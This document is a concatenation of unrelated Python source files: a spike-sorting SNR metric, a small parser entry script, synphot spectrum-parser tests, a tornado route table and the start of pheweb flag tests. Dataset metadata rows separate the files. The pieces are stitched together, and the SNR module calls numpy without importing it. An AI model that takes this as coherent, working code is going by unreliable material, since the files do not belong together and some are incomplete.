import spikemetrics.metrics as metrics
from .utils.thresholdcurator import ThresholdCurator
from .quality_metric import QualityMetric
import spiketoolkit as st
from spikemetrics.utils import Epoch, printProgressBar
from collections import OrderedDict
from .parameter_dictionaries import get_recording_gui_params, get_feature_gui_params
def make_curator_gui_params(params):
keys = list(params.keys())
types = [type(params[key]) for key in keys]
values = [params[key] for key in keys]
gui_params = [{'name': keys[0], 'type': str(types[0].__name__), 'value': values[0], 'default': values[0], 'title': "Mode to compute noise SNR ('mad' | 'std' - default 'mad')"},
{'name': keys[1], 'type': str(types[1].__name__), 'value': values[1], 'default': values[1], 'title': "Number of seconds to compute noise level from (default 10.0)"},
{'name': keys[2], 'type': str(types[2].__name__), 'value': values[2], 'default': values[2], 'title': "Maximum number of spikes to compute templates from (default 1000)"},
{'name': keys[3], 'type': str(types[3].__name__), 'value': values[3], 'default': values[3], 'title': "Use 'mean' or 'median' to compute templates"},
{'name': keys[4], 'type': str(types[4].__name__), 'value': values[4], 'default': values[4], 'title': "If maximum channel has to be found among negative peaks ('neg'), positive ('pos') or both ('both' - default)"},
{'name': keys[5], 'type': 'int', 'value': values[5], 'default': values[5], 'title': "Random seed for reproducibility"},
{'name': keys[6], 'type': str(types[6].__name__), 'value': values[6], 'default': values[6], 'title': "If True, will be verbose in metric computation."},]
curator_gui_params = [{'name': 'threshold', 'type': 'float', 'title': "The threshold for the given metric."},
{'name': 'threshold_sign', 'type': 'str',
'title': "If 'less', will threshold any metric less than the given threshold. "
"If 'less_or_equal', will threshold any metric less than or equal to the given threshold. "
"If 'greater', will threshold any metric greater than the given threshold. "
"If 'greater_or_equal', will threshold any metric greater than or equal to the given threshold."}]
gui_params = curator_gui_params + gui_params + get_recording_gui_params() + get_feature_gui_params()
return gui_params
class SNR(QualityMetric):
installed = True # check at class level if installed or not
installation_mesg = "" # err
params = OrderedDict([('snr_mode',"mad"), ('snr_noise_duration',10.0), ('max_spikes_per_unit_for_snr',1000),
('template_mode', "median"), ('max_channel_peak', "both"), ('seed',None), ('verbose',False)])
curator_name = "ThresholdSNR"
curator_gui_params = make_curator_gui_params(params)
def __init__(self, metric_data):
QualityMetric.__init__(self, metric_data, metric_name="snr")
if not metric_data.has_recording():
raise ValueError("MetricData object must have a recording")
def compute_metric(self, snr_mode, snr_noise_duration, max_spikes_per_unit_for_snr,
template_mode, max_channel_peak, save_features_props,
recompute_info, seed, save_as_property):
snrs_epochs = []
for epoch in self._metric_data._epochs:
epoch_recording = self._metric_data._recording.get_epoch(epoch[0])
epoch_sorting = self._metric_data._sorting.get_epoch(epoch[0])
channel_noise_levels = _compute_channel_noise_levels(
recording=epoch_recording,
mode=snr_mode,
noise_duration=snr_noise_duration,
seed=seed,
)
templates = st.postprocessing.get_unit_templates(
epoch_recording,
epoch_sorting,
unit_ids=self._metric_data._unit_ids,
max_spikes_per_unit=max_spikes_per_unit_for_snr,
mode=template_mode,
save_wf_as_features=save_features_props,
recompute_waveforms=recompute_info,
save_as_property=save_features_props,
seed=seed,
)
max_channels = st.postprocessing.get_unit_max_channels(
epoch_recording,
epoch_sorting,
unit_ids=self._metric_data._unit_ids,
max_spikes_per_unit=max_spikes_per_unit_for_snr,
peak=max_channel_peak,
recompute_templates=recompute_info,
save_as_property=save_features_props,
mode=template_mode,
seed=seed,
)
snr_list = []
for i, unit_id in enumerate(self._metric_data._unit_ids):
if self._metric_data.verbose:
printProgressBar(i + 1, len(self._metric_data._unit_ids))
max_channel_idx = epoch_recording.get_channel_ids().index(
max_channels[i]
)
snr = _compute_template_SNR(
templates[i], channel_noise_levels, max_channel_idx
)
snr_list.append(snr)
snrs = np.asarray(snr_list)
snrs_epochs.append(snrs)
if save_as_property:
self.save_as_property(self._metric_data._sorting, snrs_epochs, self._metric_name)
return snrs_epochs
def threshold_metric(self, threshold, threshold_sign, snr_mode, snr_noise_duration, max_spikes_per_unit_for_snr,
template_mode, max_channel_peak, save_features_props, recompute_info,
seed, save_as_property):
snrs_epochs = self.compute_metric(snr_mode, snr_noise_duration, max_spikes_per_unit_for_snr,
template_mode, max_channel_peak, save_features_props,
recompute_info, seed, save_as_property)[0]
threshold_curator = ThresholdCurator(
sorting=self._metric_data._sorting, metrics_epoch=snrs_epochs
)
threshold_curator.threshold_sorting(
threshold=threshold, threshold_sign=threshold_sign
)
return threshold_curator
def _compute_template_SNR(template, channel_noise_levels, max_channel_idx):
"""
Computes SNR on the channel with largest amplitude
Parameters
----------
template: np.array
Template (n_elec, n_timepoints)
channel_noise_levels: list
Noise levels for the different channels
max_channel_idx: int
        Index of channel with largest template
Returns
-------
snr: float
Signal-to-noise ratio for the template
"""
snr = (
np.max(np.abs(template[max_channel_idx]))
/ channel_noise_levels[max_channel_idx]
)
return snr
def _compute_channel_noise_levels(recording, mode, noise_duration, seed):
"""
Computes noise level channel-wise
Parameters
----------
recording: RecordingExtractor
        The recording extractor object
mode: str
'std' or 'mad' (default
noise_duration: float
Number of seconds to compute SNR from
Returns
-------
    noise_levels: list
Noise levels for each channel
"""
M = recording.get_num_channels()
n_frames = int(noise_duration * recording.get_sampling_frequency())
if n_frames >= recording.get_num_frames():
start_frame = 0
end_frame = recording.get_num_frames()
else:
start_frame = np.random.RandomState(seed=seed).randint(
0, recording.get_num_frames() - n_frames
)
end_frame = start_frame + n_frames
X = recording.get_traces(start_frame=start_frame, end_frame=end_frame)
noise_levels = []
for ch in range(M):
if mode == "std":
noise_level = np.std(X[ch, :])
elif mode == "mad":
noise_level = np.median(np.abs(X[ch, :]) / 0.6745)
else:
raise Exception("'mode' can be 'std' or 'mad'")
noise_levels.append(noise_level)
return noise_levels | 46.792135 | 231 | 0.623724 | 3,900 | 0.468243 | 0 | 0 | 0 | 0 | 0 | 0 | 2,152 | 0.258374 |
90818fc965fccbf18cf4f96b17fab97a599e1aaa | 824 | py | Python | parser/fase2/team16/main.py | webdev188/tytus | 847071edb17b218f51bb969d335a8ec093d13f94 | ["MIT"] | null | null | null | parser/fase2/team16/main.py | webdev188/tytus | 847071edb17b218f51bb969d335a8ec093d13f94 | ["MIT"] | null | null | null | parser/fase2/team16/main.py | webdev188/tytus | 847071edb17b218f51bb969d335a8ec093d13f94 | ["MIT"] | 4 | 2020-12-19T17:12:13.000Z | 2021-01-07T20:29:53.000Z |
# This is a sample Python script.
# Press Shift+F10 to execute it or replace it with your code.
# Press Double Shift to search everywhere for classes, files, tool windows, actions, and settings.
import Gramatica as g
import interprete as Inter
import ts as TS
import jsonMode as JSON_INGE
import jsonMode as json
import Instruccion as INST
import Interfaz.Interfaz as Gui
import os
import glob
from os import path
from os import remove
def print_hi(name):
# Use a breakpoint in the code line below to debug your script.
print(f'Hi, {name}') # Press Ctrl+F8 to toggle the breakpoint.
if __name__ == '__main__':
Gui.principal
cadena= "goto"
# for n in cadena:
# in
print("ELIMINANDO...")
files = glob.glob('data/json/*')
for ele in files:
os.remove(ele)
| 18.311111 | 98 | 0.694175 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 380 | 0.460606 |
90825885fb1011eb6a66d72e387d9a860b8e8b3f | 19,132 | py | Python | stsynphot/tests/test_parser.py | tddesjardins/stsynphot_refactor | d7c6cdd006a2173fe0ee367a3a9f10f72acafe38 | [
"MIT",
"BSD-3-Clause"
]
| 5 | 2017-07-18T20:02:34.000Z | 2022-03-10T06:46:22.000Z | stsynphot/tests/test_parser.py | tddesjardins/stsynphot_refactor | d7c6cdd006a2173fe0ee367a3a9f10f72acafe38 | [
"MIT",
"BSD-3-Clause"
]
| 103 | 2016-05-26T03:40:24.000Z | 2021-12-29T23:03:13.000Z | stsynphot/tests/test_parser.py | tddesjardins/stsynphot_refactor | d7c6cdd006a2173fe0ee367a3a9f10f72acafe38 | [
"MIT",
"BSD-3-Clause"
]
| 9 | 2016-12-14T12:56:18.000Z | 2021-09-11T22:50:01.000Z | # Licensed under a 3-clause BSD style license - see LICENSE.rst
"""Test spparser.py module, which uses spark.py.
.. note::
Only testing to see if the parser makes the right kind of
objects. Quality of the data is tested in other modules.
"""
# STDLIB
import os
# THIRD-PARTY
import pytest
from astropy import units as u
from astropy.tests.helper import assert_quantity_allclose
from astropy.utils.exceptions import AstropyUserWarning
from numpy.testing import assert_allclose
# SYNPHOT
from synphot import exceptions as synexceptions
from synphot import units
from synphot.models import (BlackBodyNorm1D, Box1D, ConstFlux1D, Empirical1D,
GaussianFlux1D, PowerLawFlux1D)
from synphot.reddening import ExtinctionCurve
from synphot.spectrum import SourceSpectrum, SpectralElement
# LOCAL
from .. import catalog, exceptions, observationmode, spectrum, spparser
from ..config import conf
from ..stio import resolve_filename
def _single_functioncall(sp, ans_cls, ans_model, ans_name, ans_z=0):
assert isinstance(sp, ans_cls)
# Do not check composite model
if ans_model is not None:
assert isinstance(sp.model, ans_model)
if ans_name:
assert sp.meta['expr'] == ans_name
if ans_z is not None:
assert_allclose(sp.z, ans_z)
def _compare_spectra(sp1, sp2):
"""Test that two spectra are basically equivalent."""
if sp1.waveset is None:
assert sp2.waveset is None
w = [100, 5000, 11000] * u.AA
else:
w = sp1.waveset
assert_quantity_allclose(w, sp2.waveset)
assert_quantity_allclose(sp1(w), sp2(w))
assert_quantity_allclose(sp1.integrate(wavelengths=w),
sp2.integrate(wavelengths=w))
assert type(sp1.model.__class__) == type(sp2.model.__class__) # noqa
if hasattr(sp1, 'z'):
assert sp1.z == sp2.z
def test_unit_1_flam():
sp1 = spparser.parse_spec('unit(1, flam)')
_single_functioncall(sp1, SourceSpectrum, ConstFlux1D, 'unit(1.0,flam)')
sp2 = SourceSpectrum(ConstFlux1D, amplitude=1 * units.FLAM)
_compare_spectra(sp1, sp2)
def test_bb_5000():
sp1 = spparser.parse_spec('bb(5000)')
_single_functioncall(sp1, SourceSpectrum, BlackBodyNorm1D, 'bb(5000.0)')
sp2 = SourceSpectrum(BlackBodyNorm1D, temperature=5000 * u.K)
_compare_spectra(sp1, sp2)
def test_powerlaw_5000_1_flam():
sp1 = spparser.parse_spec('pl(5000, 1, flam)')
_single_functioncall(
sp1, SourceSpectrum, PowerLawFlux1D, 'pl(5000.0,1.0,flam)')
sp2 = SourceSpectrum(PowerLawFlux1D, amplitude=1 * units.FLAM,
x_0=5000 * u.AA, alpha=-1)
_compare_spectra(sp1, sp2)
def test_box_5000_1():
sp1 = spparser.parse_spec('box(5000, 1)')
_single_functioncall(sp1, SpectralElement, Box1D, 'box(5000.0,1.0)',
ans_z=None)
sp2 = SpectralElement(Box1D, amplitude=1, x_0=5000 * u.AA, width=1 * u.AA)
_compare_spectra(sp1, sp2)
def test_em_5000_25_1_flam():
sp1 = spparser.parse_spec('em(5000, 25, 1, flam)')
_single_functioncall(
sp1, SourceSpectrum, GaussianFlux1D, 'em(5000, 25, 1, FLAM)')
f = 1 * (units.FLAM * u.AA) # Integrated flux
sp2 = SourceSpectrum(
GaussianFlux1D, mean=5000 * u.AA, fwhm=25 * u.AA, total_flux=f)
_compare_spectra(sp1, sp2)
def test_rn_bb_box_abmag():
sp1 = spparser.parse_spec('rn(bb(5000), box(5000, 10), 17, abmag)')
_single_functioncall(sp1, SourceSpectrum, None,
'rn(bb(5000.0),box(5000.0,10.0),17.0,abmag)')
bb = SourceSpectrum(BlackBodyNorm1D, temperature=5000 * u.K)
box = SpectralElement(Box1D, amplitude=1, x_0=5000 * u.AA, width=10 * u.AA)
sp2 = bb.normalize(17 * u.ABmag, band=box)
_compare_spectra(sp1, sp2)
def test_z_null():
"""ETC junk spectrum results in flat spectrum with no redshift."""
sp1 = spparser.parse_spec('z(null, 0.1)')
_single_functioncall(sp1, SourceSpectrum, ConstFlux1D, 'z(null,0.1)')
sp2 = SourceSpectrum(ConstFlux1D, amplitude=1 * units.PHOTLAM)
_compare_spectra(sp1, sp2)
def test_z_em():
sp1 = spparser.parse_spec('z(em(5000, 25, 1, flam), 0.1)')
_single_functioncall(
sp1, SourceSpectrum, None, 'z(em(5000, 25, 1, FLAM),0.1)', ans_z=0.1)
f = 1 * (units.FLAM * u.AA) # Integrated flux
sp2 = SourceSpectrum(
GaussianFlux1D, mean=5000 * u.AA, fwhm=25 * u.AA, total_flux=f)
sp2.z = 0.1
_compare_spectra(sp1, sp2)
@pytest.mark.remote_data
def test_remote_spec_vegafile():
sp1 = spparser.parse_spec('spec(crcalspec$alpha_lyr_stis_007.fits)')
_single_functioncall(sp1, SourceSpectrum, Empirical1D,
'spec(crcalspec$alpha_lyr_stis_007.fits)')
sp2 = SourceSpectrum.from_file(resolve_filename(
os.environ['PYSYN_CDBS'], 'calspec', 'alpha_lyr_stis_007.fits'))
_compare_spectra(sp1, sp2)
@pytest.mark.remote_data
def test_remote_band_v():
sp1 = spparser.parse_spec('band(v)')
_single_functioncall(
sp1, spectrum.ObservationSpectralElement, Empirical1D, 'band(v)',
ans_z=None)
sp2 = SpectralElement.from_filter('johnson_v')
_compare_spectra(sp1, sp2)
@pytest.mark.remote_data
def test_remote_icat_k93():
sp1 = spparser.parse_spec('icat(k93models, 5000, 0.5, 0)')
_single_functioncall(sp1, SourceSpectrum, Empirical1D,
'k93models(T_eff=5000,metallicity=0.5,log_g=0)')
sp2 = catalog.grid_to_spec('k93models', 5000, 0.5, 0)
_compare_spectra(sp1, sp2)
@pytest.mark.remote_data
def test_remote_ebmvx_mwavg():
sp1 = spparser.parse_spec('ebmvx(0.3, mwavg)')
_single_functioncall(
sp1, ExtinctionCurve, Empirical1D, 'ebmvx(0.3,mwavg)', ans_z=None)
sp2 = spectrum.ebmvx('mwavg', 0.3)
_compare_spectra(sp1, sp2)
@pytest.mark.remote_data
def test_remote_rn_calspec_box():
sp1 = spparser.parse_spec(
'rn(crcalspec$gd71_mod_005.fits, box(5000, 10), 17, vegamag)')
_single_functioncall(
sp1, SourceSpectrum, None,
'rn(crcalspec$gd71_mod_005.fits,box(5000.0,10.0),17.0,vegamag)')
gd71 = SourceSpectrum.from_file(resolve_filename(
os.environ['PYSYN_CDBS'], 'calspec', 'gd71_mod_005.fits'))
box = SpectralElement(Box1D, amplitude=1, x_0=5000 * u.AA, width=10 * u.AA)
sp2 = gd71.normalize(17 * units.VEGAMAG, band=box, vegaspec=spectrum.Vega)
_compare_spectra(sp1, sp2)
@pytest.mark.remote_data
def test_remote_rn_icat_k93():
sp1 = spparser.parse_spec(
'rn(icat(k93models, 5000, 0.5, 0), '
'cracscomp$acs_f814w_hrc_006_syn.fits, 17, obmag)')
_single_functioncall(
sp1, SourceSpectrum, None,
'rn(k93models(T_eff=5000,metallicity=0.5,log_g=0),'
'cracscomp$acs_f814w_hrc_006_syn.fits,17.0,obmag)')
k93 = catalog.grid_to_spec('k93models', 5000, 0.5, 0)
bp = SpectralElement.from_file(resolve_filename(
os.environ['PYSYN_CDBS'], 'comp', 'acs', 'acs_f814w_hrc_006_syn.fits'))
sp2 = k93.normalize(17 * units.OBMAG, band=bp, area=conf.area)
_compare_spectra(sp1, sp2)
@pytest.mark.remote_data
def test_remote_rn_powerlaw():
sp1 = spparser.parse_spec('rn(pl(5000, 1, flam), band(v), 1, photlam)')
_single_functioncall(sp1, SourceSpectrum, None,
'rn(pl(5000.0,1.0,flam),band(v),1.0,photlam)')
pl = SourceSpectrum(PowerLawFlux1D, amplitude=1 * units.FLAM,
x_0=5000 * u.AA, alpha=-1)
bp = SpectralElement.from_filter('johnson_v')
sp2 = pl.normalize(1 * units.PHOTLAM, band=bp)
_compare_spectra(sp1, sp2)
@pytest.mark.remote_data
def test_remote_rn_unit_1_flam():
sp1 = spparser.parse_spec(
'rn(unit(1,flam), band(acs, wfc1, fr388n#3881.0), 10, abmag)')
_single_functioncall(
sp1, SourceSpectrum, None,
'rn(unit(1.0,flam),band(acs,wfc1,fr388n#3881.0),10.0,abmag)')
constsp = SourceSpectrum(ConstFlux1D, amplitude=1 * units.FLAM)
bp = spectrum.band('acs, wfc1, fr388n#3881.0')
sp2 = constsp.normalize(10 * u.ABmag, band=bp)
_compare_spectra(sp1, sp2)
@pytest.mark.remote_data
def test_remote_rn_calspec_u():
sp1 = spparser.parse_spec(
'rn(crcalspec$bd_75d325_stis_002.fits, band(u), 9.5, vegamag) * '
'band(fos, blue, 4.3, g160l)')
# NOTE: No expr for this combo.
_single_functioncall(sp1, SourceSpectrum, None, '')
bd75 = SourceSpectrum.from_file(resolve_filename(
os.environ['PYSYN_CDBS'], 'calspec', 'bd_75d325_stis_002.fits'))
bp_u = SpectralElement.from_filter('johnson_u')
bd75_norm = bd75.normalize(
9.5 * units.VEGAMAG, band=bp_u, vegaspec=spectrum.Vega)
bp_fos = spectrum.band('fos, blue, 4.3, g160l')
sp2 = bd75_norm * bp_fos
_compare_spectra(sp1, sp2)
@pytest.mark.remote_data
def test_remote_z_vega():
sp1 = spparser.parse_spec('z(crcalspec$alpha_lyr_stis_007.fits, 0.1)')
_single_functioncall(sp1, SourceSpectrum, None,
'z(crcalspec$alpha_lyr_stis_007.fits,0.1)', ans_z=0.1)
sp2 = SourceSpectrum.from_file(resolve_filename(
os.environ['PYSYN_CDBS'], 'calspec', 'alpha_lyr_stis_007.fits'))
sp2.z = 0.1
_compare_spectra(sp1, sp2)
@pytest.mark.remote_data
class TestRenormPartialOverlap:
"""Test handling of ``rn(...)`` syntax for partial overlap."""
def setup_class(self):
self.fname = resolve_filename(
conf.rootdir, 'etc', 'source', 'qso_fos_001.dat')
def test_partial(self):
"""Warning only."""
input_str = f'rn({self.fname}, band(johnson, u), 15, abmag)'
with pytest.warns(AstropyUserWarning,
match=r'Spectrum is not defined everywhere'):
sp = spparser.parse_spec(input_str)
assert isinstance(sp, SourceSpectrum)
assert 'force_renorm' in sp.warnings
name = sp.meta['expr']
assert (name.startswith('rn(') and
name.endswith('qso_fos_001.dat,band(johnson,u),15.0,abmag)'))
def test_disjoint(self):
"""Raise error."""
input_str = f'rn({self.fname}, band(johnson, v), 15, abmag)'
with pytest.raises(synexceptions.DisjointError):
spparser.parse_spec(input_str)
@pytest.mark.remote_data
class TestEnvVar:
"""Test syntax using PYSYN_CDBS environment variable."""
def setup_class(self):
self.old_path = os.environ.get('PYSYN_CDBS')
if self.old_path is None:
os.environ['PYSYN_CDBS'] = conf.rootdir
def test_double_slash(self):
sp = spparser.parse_spec(
'spec($PYSYN_CDBS//calspec/gd71_mod_005.fits)')
assert isinstance(sp, SourceSpectrum)
assert isinstance(sp.model, Empirical1D)
def teardown_class(self):
if self.old_path is None:
del os.environ['PYSYN_CDBS']
@pytest.mark.parametrize(
'input_str',
['foo(1)',
'unit(1, nm)',
'unit(1, vegamag)',
'pl(5000, 1, nm)',
'pl(5000, 1, vegamag)',
'em(5000, 25, 1, nm)',
'rn(bb(5000), foo(v), 17, obmag)',
'rn(unit(1, flam), band(stis, ccd, g430m, c4451, 52X0.2), 10, abmag)',
'rn(unit(1, flam), band(stis, ccd, mirror, 50CCD), 10, abmag)',
'ebmvx(0.3, foo)'])
def test_parser_exception(input_str):
"""Test syntax that raises ParserError."""
with pytest.raises(exceptions.ParserError):
spparser.parse_spec(input_str)
class TestTokens:
"""Test underlying parser engine."""
def setup_class(self):
self.scanner = spparser.Scanner()
@pytest.mark.parametrize(
('token_type', 'token_str'),
[('FLOAT', '.1'),
('FLOAT', '1.1'),
('FLOAT', '1.'),
('FLOAT', '1'),
('FLOAT', '.1e+1'),
('FLOAT', '1.1e+1'),
('FLOAT', '1.e+1'),
('FLOAT', '1e+1'),
('FLOAT', '.1e-1'),
('FLOAT', '1.1e-1'),
('FLOAT', '1.e-1'),
('FLOAT', '1e-1'),
('FLOAT', '.1e1'),
('FLOAT', '1.1e1'),
('FLOAT', '1.e1'),
('FLOAT', '1e1'),
('IDENTIFIER', '/'),
('IDENTIFIER', 'xyzzy'),
('IDENTIFIER', 'xy20zzy'),
('IDENTIFIER', 'xyzzy20'),
('IDENTIFIER', '/a/b/c'),
('IDENTIFIER', 'foo$bar'),
('IDENTIFIER', 'a/b'),
('IDENTIFIER', '/a/b/c/foo.fits'),
('IDENTIFIER', 'C:/a/b/c/foo.fits')])
def test_single_token_1(self, token_type, token_str):
t = self.scanner.tokenize(token_str)
assert (t[0].type, t[0].attr) == (token_type, token_str)
@pytest.mark.parametrize(
('token_str', 'ans'),
[('(', ('LPAREN', None)),
(')', ('RPAREN', None)),
(',', (',', None)),
('+', ('+', None)),
('*', ('*', None)),
('@foolist', ('FILELIST', 'foolist'))])
def test_single_token_2(self, token_str, ans):
t = self.scanner.tokenize(token_str)
assert (t[0].type, t[0].attr) == ans
@pytest.mark.parametrize(
('input_str', 'ans'),
[('50CCD',
[('FLOAT', '50'),
('IDENTIFIER', 'CCD')]),
('500X0.2',
[('FLOAT', '500'),
('IDENTIFIER', 'X0.2')]),
('spec($PYSYN_CDBS//calspec/gd71_mod_005.fits)',
[('IDENTIFIER', 'spec'),
('LPAREN', None),
('IDENTIFIER', '$PYSYN_CDBS//calspec/gd71_mod_005.fits'),
('RPAREN', None)]),
('spec(earthshine.fits) * 0.5 + '
'rn(spec(Zodi.fits), band(johnson, v), 22.7, vegamag) + '
'(spec(el1215a.fits) + spec(el1302a.fits) + spec(el1356a.fits) + '
'spec(el2471a.fits)) * 0.5',
[('IDENTIFIER', 'spec'),
('LPAREN', None),
('IDENTIFIER', 'earthshine.fits'),
('RPAREN', None),
('*', None),
('FLOAT', '0.5'),
('+', None),
('IDENTIFIER', 'rn'),
('LPAREN', None),
('IDENTIFIER', 'spec'),
('LPAREN', None),
('IDENTIFIER', 'Zodi.fits'),
('RPAREN', None),
(',', None),
('IDENTIFIER', 'band'),
('LPAREN', None),
('IDENTIFIER', 'johnson'),
(',', None),
('IDENTIFIER', 'v'),
('RPAREN', None),
(',', None),
('FLOAT', '22.7'),
(',', None),
('IDENTIFIER', 'vegamag'),
('RPAREN', None),
('+', None),
('LPAREN', None),
('IDENTIFIER', 'spec'),
('LPAREN', None),
('IDENTIFIER', 'el1215a.fits'),
('RPAREN', None),
('+', None),
('IDENTIFIER', 'spec'),
('LPAREN', None),
('IDENTIFIER', 'el1302a.fits'),
('RPAREN', None),
('+', None),
('IDENTIFIER', 'spec'),
('LPAREN', None),
('IDENTIFIER', 'el1356a.fits'),
('RPAREN', None),
('+', None),
('IDENTIFIER', 'spec'),
('LPAREN', None),
('IDENTIFIER', 'el2471a.fits'),
('RPAREN', None),
('RPAREN', None),
('*', None),
('FLOAT', '0.5')]),
('spec(earthshine.fits) * 0.5 + '
'rn(spec(Zodi.fits), band(johnson, v), 22.7, vegamag) + '
'(spec(el1215a.fits) * 0.1 + spec(el1302a.fits) * 0.066666667 + '
'spec(el1356a.fits) * 0.0060 + spec(el2471a.fits) * 0.0050)',
[('IDENTIFIER', 'spec'),
('LPAREN', None),
('IDENTIFIER', 'earthshine.fits'),
('RPAREN', None),
('*', None),
('FLOAT', '0.5'),
('+', None),
('IDENTIFIER', 'rn'),
('LPAREN', None),
('IDENTIFIER', 'spec'),
('LPAREN', None),
('IDENTIFIER', 'Zodi.fits'),
('RPAREN', None),
(',', None),
('IDENTIFIER', 'band'),
('LPAREN', None),
('IDENTIFIER', 'johnson'),
(',', None),
('IDENTIFIER', 'v'),
('RPAREN', None),
(',', None),
('FLOAT', '22.7'),
(',', None),
('IDENTIFIER', 'vegamag'),
('RPAREN', None),
('+', None),
('LPAREN', None),
('IDENTIFIER', 'spec'),
('LPAREN', None),
('IDENTIFIER', 'el1215a.fits'),
('RPAREN', None),
('*', None),
('FLOAT', '0.1'),
('+', None),
('IDENTIFIER', 'spec'),
('LPAREN', None),
('IDENTIFIER', 'el1302a.fits'),
('RPAREN', None),
('*', None),
('FLOAT', '0.066666667'),
('+', None),
('IDENTIFIER', 'spec'),
('LPAREN', None),
('IDENTIFIER', 'el1356a.fits'),
('RPAREN', None),
('*', None),
('FLOAT', '0.0060'),
('+', None),
('IDENTIFIER', 'spec'),
('LPAREN', None),
('IDENTIFIER', 'el2471a.fits'),
('RPAREN', None),
('*', None),
('FLOAT', '0.0050'),
('RPAREN', None)]),
('spec(earthshine.fits) * 0.5 + '
'rn(spec(Zodi.fits), band(johnson, v), 22.7, vegamag) + '
'(spec(el1215a.fits) + spec(el1302a.fits) + spec(el1356a.fits) + '
'spec(el2471a.fits))',
[('IDENTIFIER', 'spec'),
('LPAREN', None),
('IDENTIFIER', 'earthshine.fits'),
('RPAREN', None),
('*', None),
('FLOAT', '0.5'),
('+', None),
('IDENTIFIER', 'rn'),
('LPAREN', None),
('IDENTIFIER', 'spec'),
('LPAREN', None),
('IDENTIFIER', 'Zodi.fits'),
('RPAREN', None),
(',', None),
('IDENTIFIER', 'band'),
('LPAREN', None),
('IDENTIFIER', 'johnson'),
(',', None),
('IDENTIFIER', 'v'),
('RPAREN', None),
(',', None),
('FLOAT', '22.7'),
(',', None),
('IDENTIFIER', 'vegamag'),
('RPAREN', None),
('+', None),
('LPAREN', None),
('IDENTIFIER', 'spec'),
('LPAREN', None),
('IDENTIFIER', 'el1215a.fits'),
('RPAREN', None),
('+', None),
('IDENTIFIER', 'spec'),
('LPAREN', None),
('IDENTIFIER', 'el1302a.fits'),
('RPAREN', None),
('+', None),
('IDENTIFIER', 'spec'),
('LPAREN', None),
('IDENTIFIER', 'el1356a.fits'),
('RPAREN', None),
('+', None),
('IDENTIFIER', 'spec'),
('LPAREN', None),
('IDENTIFIER', 'el2471a.fits'),
('RPAREN', None),
('RPAREN', None)])])
def test_composite_token(self, input_str, ans):
t = self.scanner.tokenize(input_str)
for expect, actual in zip(ans, t):
assert (actual.type, actual.attr) == expect
def teardown_module():
"""Clear all cache."""
catalog.reset_cache()
observationmode.reset_cache()
spectrum.reset_cache()
| 33.447552 | 79 | 0.559011 | 9,145 | 0.477995 | 0 | 0 | 14,317 | 0.748327 | 0 | 0 | 6,032 | 0.315283 |
9082f22e3410593d0f53f454a62bd2d756d1a9be | 554 | py | Python | rsbroker/urls.py | land-pack/RsBroker | d556fda09582e0540cac0eabc163a984e8fc1c44 | [
"Apache-2.0"
]
| null | null | null | rsbroker/urls.py | land-pack/RsBroker | d556fda09582e0540cac0eabc163a984e8fc1c44 | [
"Apache-2.0"
]
| null | null | null | rsbroker/urls.py | land-pack/RsBroker | d556fda09582e0540cac0eabc163a984e8fc1c44 | [
"Apache-2.0"
]
| null | null | null | from __future__ import absolute_import
import os
from tornado.web import StaticFileHandler
from rsbroker.views import websocket
from rsbroker.views.error import NotFoundErrorHandler
settings = dict(
template_path=os.path.join(os.path.dirname(__file__), "templates"),
static_path=os.path.join(os.path.dirname(__file__), "static")
)
handlers = [
# Http api
# Events WebSocket API
(r"/api/ws", websocket.BrokerServerHandler),
# Static
(r"/static/(.*)", StaticFileHandler),
# Error
(r".*", NotFoundErrorHandler)
]
| 20.518519 | 71 | 0.714801 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 96 | 0.173285 |
9083f275a59b9bf245934e27e32ceb9469c2cb0d | 6,465 | py | Python | tests/pheweb/load/command_flags_test.py | stellakeppo/pheweb | 10ea317dbe9419fa77f99e6b735fa9a3290ccd5e | [
"MIT"
]
| 4 | 2018-11-03T13:58:52.000Z | 2020-03-06T09:19:03.000Z | tests/pheweb/load/command_flags_test.py | stellakeppo/pheweb | 10ea317dbe9419fa77f99e6b735fa9a3290ccd5e | [
"MIT"
]
| 92 | 2018-05-17T18:07:01.000Z | 2022-03-29T00:37:30.000Z | tests/pheweb/load/command_flags_test.py | stellakeppo/pheweb | 10ea317dbe9419fa77f99e6b735fa9a3290ccd5e | [
"MIT"
]
| 4 | 2020-07-01T12:20:55.000Z | 2022-01-24T20:09:15.000Z | # -*- coding: utf-8 -*-
"""
Unit testing for command flags.
This tests the various command flags
and there helper methods.
"""
import argparse
import typing
import uuid
import pytest
from pheweb.load.command_flags import (
FLAG_CHROMOSOME,
add_chromosome_flag,
OUTPUT_COLUMN_CHROMOSOME,
FLAG_POSITION,
add_position_flag,
FLAG_REFERENCE,
add_reference_flag,
FLAG_ALTERNATIVE,
add_alternate_flag,
OUTPUT_COLUMN_REFERENCE,
OUTPUT_COLUMN_ALTERNATIVE,
FLAG_P_VALUE,
add_p_value_flag,
OUTPUT_COLUMN_P_VALUE,
FLAG_M_LOG_P_VALUE,
add_m_log_p_value_flag,
OUTPUT_COLUMN_M_LOG_P_VALUE,
add_beta_value_flag,
FLAG_BETA,
OUTPUT_COLUMN_BETA,
FLAG_SE_BETA,
add_se_beta_value_flag,
OUTPUT_COLUMN_SE_BETA,
OUTPUT_COLUMN_POSITION,
add_in_file_value_flag,
DEFAULT_IN_FILE,
add_out_file_value_flag,
DEFAULT_OUT_FILE,
add_rename_value_flag,
DEFAULT_RENAME,
add_exclude_value_flag,
FLAG_EXCLUDE,
FLAG_RENAME,
DEFAULT_EXCLUDE,
parse_exclude_args,
parse_rename_args,
)
def test_exclude_args() -> None:
"""
Test exclude args.
@return: None
"""
assert parse_exclude_args("") == set()
assert parse_exclude_args("a") == {"a"}
assert parse_exclude_args("a,b") == {"a", "b"}
assert parse_exclude_args("a,b,c") == {"a", "b", "c"}
def test_rename_args() -> None:
"""
Test rename args.
@return: None
"""
assert not parse_rename_args("")
assert parse_rename_args("a:b") == {"a": "b"}
assert parse_rename_args("a:b,c:d") == {"a": "b", "c": "d"}
with pytest.raises(ValueError):
assert parse_rename_args("a")
def parse_harness(
cli_argv: typing.List[str],
parse_method: typing.Callable[[argparse.ArgumentParser], None],
):
"""
Parse harness.
Calls the argument parser with the parse method.
Then calls the argument parse with the cli argv.
@param cli_argv: arguments to pass to parser
@param parse_method: parse set up method
@return: result of the parse
"""
parser = argparse.ArgumentParser(description=f"test : {parse_method}")
parse_method(parser)
return parser.parse_args(cli_argv)
def test_add_chromosome() -> None:
"""
Test arguments for chromosome column.
@return: None
"""
